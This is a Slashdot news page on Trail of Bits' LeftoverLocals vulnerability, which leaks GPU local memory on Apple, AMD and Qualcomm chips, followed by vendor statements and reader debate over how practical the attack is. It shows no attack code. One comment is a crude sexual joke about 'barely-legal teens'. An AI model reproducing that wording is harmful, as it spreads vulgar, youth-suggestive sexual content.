Please create an account to participate in the Slashdot moderation system

 



Forgot your password?
typodupeerror
×
Security AI Graphics

A Flaw In Millions of Apple, AMD, and Qualcomm GPUs Could Expose AI Data (wired.com) 22

An anonymous reader quotes a report from Wired: As more companies ramp up development of artificial intelligence systems, they are increasingly turning to graphics processing unit (GPU) chips for the computing power they need to run large language models (LLMs) and to crunch data quickly at massive scale. Between video game processing and AI, demand for GPUs has never been higher, and chipmakers are rushing to bolster supply. In new findings released today, though, researchers are highlighting a vulnerability in multiple brands and models of mainstream GPUs -- including Apple, Qualcomm, and AMD chips -- that could allow an attacker to steal large quantities of data from a GPU's memory. The silicon industry has spent years refining the security of central processing units, or CPUs, so they don't leak data in memory even when they are built to optimize for speed. However, since GPUs were designed for raw graphics processing power, they haven't been architected to the same degree with data privacy as a priority. As generative AI and other machine learning applications expand the uses of these chips, though, researchers from New York -- based security firm Trail of Bits say that vulnerabilities in GPUs are an increasingly urgent concern. "There is a broader security concern about these GPUs not being as secure as they should be and leaking a significant amount of data," Heidy Khlaaf, Trail of Bits' engineering director for AI and machine learning assurance, tells WIRED. "We're looking at anywhere from 5 megabytes to 180 megabytes. In the CPU world, even a bit is too much to reveal."

To exploit the vulnerability, which the researchers call LeftoverLocals, attackers would need to already have established some amount of operating system access on a target's device. Modern computers and servers are specifically designed to silo data so multiple users can share the same processing resources without being able to access each others' data. But a LeftoverLocals attack breaks down these walls. Exploiting the vulnerability would allow a hacker to exfiltrate data they shouldn't be able to access from the local memory of vulnerable GPUs, exposing whatever data happens to be there for the taking, which could include queries and responses generated by LLMs as well as the weights driving the response. In their proof of concept, as seen in the GIF below, the researchers demonstrate an attack where a target -- shown on the left -- asks the open source LLM Llama.cpp to provide details about WIRED magazine. Within seconds, the attacker's device -- shown on the right -- collects the majority of the response provided by the LLM by carrying out a LeftoverLocals attack on vulnerable GPU memory. The attack program the researchers created uses less than 10 lines of code. [...] Though exploiting the vulnerability would require some amount of existing access to targets' devices, the potential implications are significant given that it is common for highly motivated attackers to carry out hacks by chaining multiple vulnerabilities together. Furthermore, establishing "initial access" to a device is already necessary for many common types of digital attacks.
The researchers did not find evidence that Nvidia, Intel, or Arm GPUs contain the LeftoverLocals vulnerability, but Apple, Qualcomm, and AMD all confirmed to WIRED that they are impacted. Here's what each of the affected companies had to say about the vulnerability, as reported by Wired:

Apple: An Apple spokesperson acknowledged LeftoverLocals and noted that the company shipped fixes with its latest M3 and A17 processors, which it unveiled at the end of 2023. This means that the vulnerability is seemingly still present in millions of existing iPhones, iPads, and MacBooks that depend on previous generations of Apple silicon. On January 10, the Trail of Bits researchers retested the vulnerability on a number of Apple devices. They found that Apple's M2 MacBook Air was still vulnerable, but the iPad Air 3rd generation A12 appeared to have been patched.
Qualcomm: A Qualcomm spokesperson told WIRED that the company is "in the process" of providing security updates to its customers, adding, "We encourage end users to apply security updates as they become available from their device makers." The Trail of Bits researchers say Qualcomm confirmed it has released firmware patches for the vulnerability.
AMD: AMD released a security advisory on Wednesday detailing its plans to offer fixes for LeftoverLocals. The protections will be "optional mitigations" released in March.
Google: For its part, Google says in a statement that it "is aware of this vulnerability impacting AMD, Apple, and Qualcomm GPUs. Google has released fixes for ChromeOS devices with impacted AMD and Qualcomm GPUs."
This discussion has been archived. No new comments can be posted.

A Flaw In Millions of Apple, AMD, and Qualcomm GPUs Could Expose AI Data

Comments Filter:
  • by GlobalEcho ( 26240 ) on Thursday January 18, 2024 @08:17AM (#64169555)

    Is there really much of interest to exfiltrators? The article discusses LLMs (since that is the trendy use of GPUs). Well, the training data for those is typically far from sensitive. Similarly for coefficients, especially if the set isn't complete.

    Perhaps a better case for data security concerns can be made for screen representations with visible passwords. But generally speaking sensitive stuff is in regular memory and the CPU.

    • People are [going to be] training in-house LLMs with sensitive data. So if you're talking about a ChatGPT then it's pretty irrelevant, but if you're talking about someone's internal model that they're using to deliver domain-specific information, to summarize trends in PII, or similar, there's going to be plenty of valuable data in there.

      • GPUs need to begin to integrate the security features of CPUs now that they are being used more heavily for operations that require security; however the attack requires a foothold in what should be a secure corporate network, so this will likely always be more of a netsec issue to mitigate than a GPU/LLM issue.
        • I don't really disagree with what you said, but defense in depth is a basic tenet of security. Yes, secure the OS against intrusion, but also secure the software against misuse by a logged in user. Not all attackers come from outside.

      • by znrt ( 2424692 )

        yes, and to get to that data they have to be able to inject code into your gpu, meaning that before they do they already own your system and could have exfiltrated literally everything from it, or be silently watching all of your activity, not just your conversation with a language model.

        • Wrong. They have to have gained access to your system but by default they will be able to affect your GPU but not to bypass file security, meaning that access to the GPU will give them access to things they otherwise could not see on your system. They don't need to be root.

    • Attackers with access to your operating system could be defiling your barely-legal teens before they even get to your monitor. If the freshness of fresh-faced goo-glazed teen tramps matters at all to you, you'll see why this is a huge problem.

    • The en-masse users (like LLMs, even the private ones) won't have a real problem with this - the attackers's got to get onto the system running the GPU, which if they've done that, there are far bigger problems than what they might extract from the GPU.

      Little old me on my M1 Mac is more of a concern - I'm far more likely to have "someone elses code" running on my computer, and I'm far less likely to carefully control what goes into my GPU (I could barely tell you what it's used for, or when). They're unlikel

  • There are lots of problems with Nvidia and I'm definitely not in love with their pricing, but are there still people out there who doubt that they are multiple times more competent at writing software than AMD? There's only really two players in this space, although Intel is trying harder than usual so they may well take the #2 spot from AMD if the AMD devs don't figure out how to write a decent driver sometime soon. (March?)

    If there's big news here it's that Intel doesn't appear to be vulnerable to this ki

    • by RedK ( 112790 )

      > but are there still people out there who doubt that they are multiple times more competent at writing software than AMD?

      Yes, everyone who had to get a GPU running on Linux. AMD is tons easier and better.

      • > but are there still people out there who doubt that they are multiple times more competent at writing software than AMD?

        Yes, everyone who had to get a GPU running on Linux. AMD is tons easier and better.

        One installer, following the instructions, zero deviations from them, driver and CUDA installed and working. If you find downloading and running an installer to be difficult, then Slashdot is not for you.

        • by wiggles ( 30088 )

          Compared to just working out of the box? Yep. AMD wins.

          I am 90% switched to Linux thanks to AMD. All my games work now.

          Nvidia was such a pain in the arse with their proprietary packages. AMD's Open Source modules are far superior on Linux.

      • by gweihir ( 88907 )

        Indeed. Same here. One reason Nvidia is on my "do not buy" list.

    • Nvidia had this same basic vulnerability discovered in their drivers and patched years back already, before anyone was paying much attention to the others. I think this is more about the rising level of scrutiny upon the other vendors as their products begin to attain relevant performance levels for busting into markets people care about.

      • That's still good for Nvidia and bad for everyone else though, again except for Intel for a change. If Nvidia faced this problem and solved it then it should have been obvious to everyone else.

  • by thegarbz ( 1787294 ) on Thursday January 18, 2024 @10:47AM (#64169915)

    I liken this to the same risks with the CPU. Great in theory, not so good in practice. To exfiltrate data meaningfully you need to know what to look for and you need to time it in a way you can get at the data, otherwise you're exfiltrating massive amount of data that is unlikely to go unnoticed even if the system has the bandwidth to do so on the fly.

    The same on the GPU except a difference in scale. TFS talks about 5 to 180MB. You start any AI training or processing workload and you instantly peg your GPU memory, you're literally moving 10s to 100s of GB of data around.

    I take issue with TFS's point that even is single bit is too much. That's only true if you can accurately control which bit, and have the required knowledge to target it. This is where all these attacks fail from practical point of view, the amount of information needed from the target system virtually requires you to already be the administrator on it at which point, why bother with such a convoluted attack.

  • Sure, the vulnerability technically exists. Abstractly. But telling me that millions of phones have it implies there's some reason those people should be concerned. The article seems to say that people who have gained access to a system running the LLM processes can, in effect, listen in on parts of RAM.

    But is there a corresponding risk on a phone? I mean... at all? Seems like an idle curiosity for those technically interested, but the idea that anybody's going to run around trying to patch old iPhone model

He who has but four and spends five has no need for a wallet.

Working...